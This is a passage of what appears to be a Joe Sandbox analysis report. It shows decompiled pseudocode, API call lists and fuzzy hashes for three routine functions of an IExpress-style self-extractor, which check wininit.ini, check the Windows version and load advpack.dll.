                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C24E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E000C658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 000C2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 000C252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 000C253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 000C254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 000C2555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: b6d6d68c0b91f28bff28d3db6448457e71764ffdbee71aaa504114907cd0450f
                                                                                                                                                                                                        • Instruction ID: 957546df49f5726337be3acf6649ea86062541370075b70ca48cf90d9ca6c828
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6d6d68c0b91f28bff28d3db6448457e71764ffdbee71aaa504114907cd0450f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2201B532B0011867D7209B659C0CEDFBBBCDB46794F100169FA49D3190DE788E45CAA5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E000C36EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xc8184 = 1;
                                                                                                                                                                                                        						 *0xc8180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xc9a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xc8a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E000C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E000C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xc8a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xc8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("cent");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E000C681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E000C67C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E000C28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xc9a40 = _t119;
                                                                                                                                                                                                        						 *0xc8184 = 1;
                                                                                                                                                                                                        						 *0xc8180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xc9a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xc8184 = _t135;
                                                                                                                                                                                                        							 *0xc8180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E000C44B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E000C6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x000c3a09
                                                                                                                                                                                                        0x000c39fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c39fc
                                                                                                                                                                                                        0x000c39d3
                                                                                                                                                                                                        0x000c39d8
                                                                                                                                                                                                        0x000c39da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c39dc
                                                                                                                                                                                                        0x000c39b6
                                                                                                                                                                                                        0x000c3955
                                                                                                                                                                                                        0x000c395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3961
                                                                                                                                                                                                        0x000c3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3969
                                                                                                                                                                                                        0x000c3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3969
                                                                                                                                                                                                        0x000c3915
                                                                                                                                                                                                        0x000c3915
                                                                                                                                                                                                        0x000c391b
                                                                                                                                                                                                        0x000c391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c392d
                                                                                                                                                                                                        0x000c3933
                                                                                                                                                                                                        0x000c3938
                                                                                                                                                                                                        0x000c393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3940
                                                                                                                                                                                                        0x000c3946
                                                                                                                                                                                                        0x000c394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38f2
                                                                                                                                                                                                        0x000c3843
                                                                                                                                                                                                        0x000c3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c384b
                                                                                                                                                                                                        0x000c384d
                                                                                                                                                                                                        0x000c3883
                                                                                                                                                                                                        0x000c3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c389a
                                                                                                                                                                                                        0x000c389e
                                                                                                                                                                                                        0x000c389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38a0
                                                                                                                                                                                                        0x000c38a0
                                                                                                                                                                                                        0x000c38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38a4
                                                                                                                                                                                                        0x000c384f
                                                                                                                                                                                                        0x000c3851
                                                                                                                                                                                                        0x000c3857
                                                                                                                                                                                                        0x000c386e
                                                                                                                                                                                                        0x000c3877
                                                                                                                                                                                                        0x000c387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3881
                                                                                                                                                                                                        0x000c3859
                                                                                                                                                                                                        0x000c385c
                                                                                                                                                                                                        0x000c3862
                                                                                                                                                                                                        0x000c3866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38f4
                                                                                                                                                                                                        0x000c38f4
                                                                                                                                                                                                        0x000c38f5
                                                                                                                                                                                                        0x000c38fb
                                                                                                                                                                                                        0x000c3901
                                                                                                                                                                                                        0x000c3901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c390a
                                                                                                                                                                                                        0x000c374b
                                                                                                                                                                                                        0x000c374e
                                                                                                                                                                                                        0x000c375c
                                                                                                                                                                                                        0x000c3764
                                                                                                                                                                                                        0x000c3769
                                                                                                                                                                                                        0x000c376e
                                                                                                                                                                                                        0x000c3771
                                                                                                                                                                                                        0x000c379c
                                                                                                                                                                                                        0x000c379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c37a3
                                                                                                                                                                                                        0x000c37a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c37a4
                                                                                                                                                                                                        0x000c3773
                                                                                                                                                                                                        0x000c3777
                                                                                                                                                                                                        0x000c3778
                                                                                                                                                                                                        0x000c377f
                                                                                                                                                                                                        0x000c3781
                                                                                                                                                                                                        0x000c378e
                                                                                                                                                                                                        0x000c378e
                                                                                                                                                                                                        0x000c3794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3794
                                                                                                                                                                                                        0x000c3783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3785
                                                                                                                                                                                                        0x000c378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c378c
                                                                                                                                                                                                        0x000c3750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c372d
                                                                                                                                                                                                        0x000c372d
                                                                                                                                                                                                        0x000c396b
                                                                                                                                                                                                        0x000c396b
                                                                                                                                                                                                        0x000c396c
                                                                                                                                                                                                        0x000c396e
                                                                                                                                                                                                        0x000c396f
                                                                                                                                                                                                        0x000c3a1e
                                                                                                                                                                                                        0x000c3a1e
                                                                                                                                                                                                        0x000c3a22
                                                                                                                                                                                                        0x000c3a27
                                                                                                                                                                                                        0x000c3a3e
                                                                                                                                                                                                        0x000c3a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 000C3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 000C39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 000C39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: c00205e30bef6571732080c78e023357869794dbe87ffee57315f8a282b4868c
                                                                                                                                                                                                        • Instruction ID: 417a21af46cda3275e7952c0d856a9990922724e4f544d087be7b4ececf2d335
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c00205e30bef6571732080c78e023357869794dbe87ffee57315f8a282b4868c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9891E371A212249FEBB48B15CC81FEEB7F0EB45304F1581ADD84A9B291DB758F80CB42
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E000C6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E000C1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E000C658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000C64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000C64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000C6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-875882553
                                                                                                                                                                                                        • Opcode ID: 36974e4effcdfd2f305b285f8be0da25b44b1ed98814157bc0de30616f1749f7
                                                                                                                                                                                                        • Instruction ID: 17a0ac516a7ccb91c07c8ad61960dd218f4b1528952aa0ede1aba1fa880e289d
